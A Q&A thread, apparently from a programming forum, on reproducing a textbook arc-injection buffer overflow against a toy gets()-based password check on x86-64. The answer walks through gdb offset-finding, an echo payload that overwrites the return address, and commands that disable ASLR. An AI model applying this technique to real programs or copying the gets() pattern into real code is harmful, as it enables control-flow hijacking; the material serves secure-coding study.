# Constructing a tainted string for arc injection

Tags: c, security, buffer-overflow, control-flow

I'm new to security and currently referring to Robert Seacord's [Secure Coding in C and C++.](http://www.cert.org/secure-coding/publications/books/secure-coding-c-c-second-edition.cfm?) In chapter 2 of the same, the author talks about arc injection, wherein he passes the flow of control in the following program from the `isPasswordOK()` routine to the `else() {puts ("Access granted!");};` branch in `main()` by overwriting the `Password` buffer in `gets()` call with a tainted string: `1234567890123456j>*!`

```
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

bool isPasswordOK(void) {
    char Password[12];

    gets(Password);
    return 0 == strcmp(Password, "goodpass");
}

int main(void) {
    bool pwStatus;

    puts("Enter Password: ");
    pwStatus = isPasswordOK();
    if (pwStatus == false) {
        puts("Access denied");
        exit(-1);
    }
    else {
        puts("Access granted!");
    }
}
```

Here, `j = 0x6A`, `> = 0x10` (This is the Data Link Escape symbol), `* = 0x2A` and `! = 0x21`

This sequence of 4 characters then correspond to a 4 byte address, which I'm assuming is `0x6A102A21`. This address, I think, points to the `else` line in the `main()` function, and we redirect control by overwriting the return address on the stack by the address of this line.

I'm trying to reproduce the same on my machine (x86-64 architecture). I've turned stack protection and randomization off, so I don't think that should be a issue. In fact, the program crashes as expected when I try to corrupt the return address. My problem is: how do I provide as an input to `gets` the tainted string? If I disassemble `main` using gdb, I get the following output:

```
(gdb) disassemble main
Dump of assembler code for function main:
   0x0000000000400642 <+0>: push   %rbp
   0x0000000000400643 <+1>: mov    %rsp,%rbp
   0x0000000000400646 <+4>: sub    $0x10,%rsp
   0x000000000040064a <+8>: mov    $0x40071d,%edi
   0x000000000040064f <+13>:    callq  0x4004c0 <puts@plt>
   0x0000000000400654 <+18>:    callq  0x400616 <isPasswordOK>
   0x0000000000400659 <+23>:    mov    %al,-0x1(%rbp)
   0x000000000040065c <+26>:    movzbl -0x1(%rbp),%eax
   0x0000000000400660 <+30>:    xor    $0x1,%eax
   0x0000000000400663 <+33>:    test   %al,%al
   0x0000000000400665 <+35>:    je     0x40067b <main+57>
   0x0000000000400667 <+37>:    mov    $0x40072e,%edi
   0x000000000040066c <+42>:    callq  0x4004c0 <puts@plt>
   0x0000000000400671 <+47>:    mov    $0xffffffff,%edi
   0x0000000000400676 <+52>:    callq  0x400510 <exit@plt>
   0x000000000040067b <+57>:    mov    $0x40073c,%edi
   0x0000000000400680 <+62>:    callq  0x4004c0 <puts@plt>
   0x0000000000400685 <+67>:    leaveq 
   0x0000000000400686 <+68>:    retq   
End of assembler dump.
```

Since I want to jump to the second `puts()` call, I think I need to provide `0x0000000000400680` as a part of my tainted string because this is the address of the second `puts()` according to the gdb disassembly.

How can I do this? In the book, the address were of length 4 bytes, but here I have to deal with 16 bytes. Also, there is no ASCII representation for `0x80`, so what am I supposed to provide as an input to `gets`? Basically, what I'm asking for are the characters that I should provide at **?**:

1234567890123456????

I'm utterly confused, so any help is appreciated, thanks!

Comment: On a x86-64, pointers are 64 bits (8 bytes) in size.

Comment: To put random hex values in a string you can do "\x80\x80" which will put the values 0x80 0x80 in two sequential bytes.

Comment: That's another part where I'm confused: if `0x4004c0` is indeed the address, then it is less than 4 bytes long, how to convert it to 8 bytes, and then to ASCII? The return address is itself 8 bytes long, right? I need to modify this only, if I'm understanding the concept correctly.

Comment: Assembly code allows leading zeroes of a value to be omitted.  The return address should be 8 bytes long.  In the example, it was 4 (on a 32 bit machine).  So you need to end the string with "\x00\x00\x00\x00\x00\x40\x06\x80".  Or endian reverse that -- I'm not sure on a x86.  You can do that easily within your program.  It may not be possible to enter such input from the terminal because gets() may object to a nul terminator in your input and stop reading further.

Answer (score 1):

I had the same problem and I will try to help you. The problem is that the string highly depends also on the compiler, so I will explain you how to get the string acording to my example.

My program looks like this (similar to yours)

isPasswordOk.cpp:

```
#include <iostream>
#include <cstdio>
#include <cstring>

bool isPasswordOk()
{
    int result = 0xBBBBBBBB;
    char password[10];
    std::gets(password);
    result = strcmp(password, "good") == 0;
    return result;
}

int main()
{
    bool pwStatus;
    std::puts("Enter password:");
    pwStatus = isPasswordOk();
    if (pwStatus == false)
    {
        puts("Access denied!");
        return -1;
    }
    puts("Access granted!");
    return 0;
}
```

Then how do you compile this:

```
g++ isPasswordOk.cpp -std=c++11 -fno-stack-protector -o isPasswordOk
```

Important is the -fno-stack-protector, so not canarys are created. You can ofcourse use another c++ standard. But my example does not compile with std=c++14, because the gets function was removed.

Stack when calling isPasswordOk()

```
+-------------------------+  <--- stack pointer (rsp/esp)
|                         |
|    password-buffer      |
|                         |
|  --------------------   |
|       result            |   0xBBBBBBBB
|  ---------------------  |
|      (canary)           |  # when not disabled
+-------------------------+  <--- RBP
|  Caller RBP frame ptr   |
| ---------------------   |
|   Return Addr Caller    |
+-------------------------+
```

Now use gdb to get the string to do the arc-injection.
 gdb isPasswordOk

```
(gdb) run 
Enter password:
AAAA
Access denied!
(gdb) disassemble isPasswordOk
 Dump of assembler code for function _Z12isPasswordOkv:
   0x0000555555554850 <+0>: push   %rbp
   0x0000555555554851 <+1>: mov    %rsp,%rbp
   0x0000555555554854 <+4>: sub    $0x10,%rsp
   0x0000555555554858 <+8>: movl   $0xbbbbbbbb,-0x4(%rbp)
   0x000055555555485f <+15>:    lea    -0x10(%rbp),%rax
   0x0000555555554863 <+19>:    mov    %rax,%rdi
   0x0000555555554866 <+22>:    callq  0x555555554710
   0x000055555555486b <+27>:    lea    -0x10(%rbp),%rax
   0x000055555555486f <+31>:    lea    0x14f(%rip),%rsi        # 0x5555555549c5
   0x0000555555554876 <+38>:    mov    %rax,%rdi
   0x0000555555554879 <+41>:    callq  0x555555554718
   0x000055555555487e <+46>:    test   %eax,%eax
   0x0000555555554880 <+48>:    sete   %al
   0x0000555555554883 <+51>:    movzbl %al,%eax
   0x0000555555554886 <+54>:    mov    %eax,-0x4(%rbp)
   0x0000555555554889 <+57>:    cmpl   $0x0,-0x4(%rbp)
   0x000055555555488d <+61>:    setne  %al
   0x0000555555554890 <+64>:    leaveq
   0x0000555555554891 <+65>:    retq
End of assembler dump.
```

Now set some breakpoints

```
(gdb) break * 0x0000555555554858  # set breakpoint before gets
(gdb) break * 0x0000555555554879  # set breakpoint after gets
```

Now run it again (with the x option you can print the memory):

```
(gdb) run
Enter password:
AAAA
(gdb) x/12xw $rsp   # rsp for 64 bit, esp for 32 bit
0x7fffffffde20: 0xffffde50  0x00007fff  0x55554720  0x00005555
0x7fffffffde30: 0xffffde50  0x00007fff  0x555548ab  0x00005555
0x7fffffffde40: 0xffffdf30  0x00007fff  0x00000000  0x00000000
(gdb) c
(gdb) x/12xw $rsp
0x7fffffffde20: 0x41414141  0x00007fff  0x55554720  0xBBBBBBBB  # 0x41='A'
0x7fffffffde30: 0xffffde50  0x00007fff  0x555548ab  0x00005555
0x7fffffffde40: 0xffffdf00  0x00007fff  0x00000000  0x00000000
Access denied!
```

So the password was written on the address 0x7fffffffde20: 0x41414141 = "AAAA"
The local variable result is put after the buffer 0xBBBBBBBB.
You can also see that the buffer is internally 12 bytes, also I defined it to be 10 bytes.
So if I want to overwrite the Return Addr Caller 0x555548ab 0x00005555 I must write 0x20 (32) bytes.

First I have to know the address. Therefore I use the gdb again:

```
(gdb) disass main
 Dump of assembler code for function main:
   0x0000555555554892 <+0>: push   %rbp
   0x0000555555554893 <+1>: mov    %rsp,%rbp
   0x0000555555554896 <+4>: sub    $0x10,%rsp
   0x000055555555489a <+8>: lea    0x128(%rip),%rdi        # 0x5555555549c9
   0x00005555555548a1 <+15>:    callq  0x5555555546f0
   0x00005555555548a6 <+20>:    callq  0x555555554850 <_Z12isPasswordOkv>
   0x00005555555548ab <+25>:    mov    %al,-0x1(%rbp)
   0x00005555555548ae <+28>:    movzbl -0x1(%rbp),%eax
   0x00005555555548b2 <+32>:    xor    $0x1,%eax
   0x00005555555548b5 <+35>:    test   %al,%al
   0x00005555555548b7 <+37>:    je     0x5555555548cc <main+58>
   0x00005555555548b9 <+39>:    lea    0x119(%rip),%rdi        # 0x5555555549d9
   0x00005555555548c0 <+46>:    callq  0x5555555546f0
   0x00005555555548c5 <+51>:    mov    $0xffffffff,%eax
   0x00005555555548ca <+56>:    jmp    0x5555555548dd <main+75>
   0x00005555555548cc <+58>:    lea    0x115(%rip),%rdi        # 0x5555555549e8
   0x00005555555548d3 <+65>:    callq  0x5555555546f0
   0x00005555555548d8 <+70>:    mov    $0x0,%eax
   0x00005555555548dd <+75>:    leaveq
   0x00005555555548de <+76>:    retq
End of assembler dump.
```

I want to jump to the address 0x00005555555548cc. So you have to create the string like this:

```
echo -ne 'AAAAAAAAAAAAAAAAAAAAAAAA\xcc\x48\x55\x55\x55\x55\x00\x00' > arcInjection.txt
```

Then you can call it by running:

```
(gdb) run < arcInjection.txt
Access granted!
```

If you want to run it outside the gdb, you have to disable address space layout randomization (ASR)

```
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```

Then you can run it also in the console:

```
./isPasswordOk < arcInjection.txt 
Enter password:
Access granted!
```

The ASR is activated again after reboot, or if you call afterwards:

```
echo 1 | sudo tee /proc/sys/kernel/randomize_va_space
```

Comment: Very helpful. After a successful run at the console I had one last message: `Bus error (core dumped)`. I find I can only avoid that by preserving the 2 words which follow the local variable result. So I need to replace the last 8 of your 'A's with 0xffffde50 and 0x00007fff. I wonder if this can be avoided?